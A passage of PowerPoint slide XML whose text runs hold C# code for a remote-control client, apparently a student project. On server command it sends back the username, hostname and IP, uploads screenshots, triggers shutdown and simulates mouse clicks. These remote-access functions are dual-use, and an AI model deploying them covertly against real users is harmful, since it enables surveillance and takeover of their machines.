            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SendInfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>        {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>            while ((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>isable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t> == true) &amp;&amp; (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>clientSock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t> != null))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>            {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>                string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>dataFromServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>getData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>                if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>dataFromServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t> == "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>GetName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>                {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>                    s = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>SystemInformation.UserName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t> x = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>                    s += "#" + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>jgf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>                    string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>strHostName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t> = "";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>strHostName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>Dns.GetHostName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>IPHostEntry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>ipEntry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>Dns.GetHostEntry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>strHostName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>IPAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>ipEntry.AddressList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>                    s += "#" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>[0].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>ToString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" err="1"/>
              <a:t>sendData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>(s);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t>                }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL" sz="4300" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="3446602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40000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dataFromServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> == "pic")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    Bitmap picture = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SaveScreenShot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>picture.Save</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(@"C:\temp\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>image.Jpeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ImageFormat.Jpeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    upload up = new upload();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>up.startUpload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(@"C:\temp\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>image.Jpeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>clientSock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>picture.Dispose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                if ((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dataFromServer.Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; 3) &amp;&amp; (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dataFromServer.Substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(0, 2) == "PB"))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    string[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Aize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dataFromServer.Split</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('#');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    Bitmap picture = SaveScreenShot2(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int.Parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Aize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[1]), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int.Parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Aize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[2]));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>picture.Save</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(@"C:\temp\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>image.Jpeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ImageFormat.Jpeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    upload up = new upload();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>up.startUpload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(@"C:\temp\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>image.Jpeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>clientSock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>picture.Dispose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="14174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32500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dataFromServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> == "Shutdown")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shutdown.kill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dataFromServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> == "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CancelShutdown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cancel.kill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if ((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dataFromServer.Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; 3) &amp;&amp; (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dataFromServer.Substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(0, 2) == "me"))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    string[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dataFromServer.Split</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('#');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int.Parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[3]) == 1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cursor.Position</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = new Point(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int.Parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[1]), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int.Parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[2]));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mouse_event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(MOUSEEVENTF_LEFTDOWN, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int.Parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[1]) * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>yahasW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int.Parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[2]) * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>yahasH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 0, 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mouse_event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(MOUSEEVENTF_LEFTUP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int.Parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[1]) * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>yahasW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int.Parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[2]) * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>yahasH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 0, 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
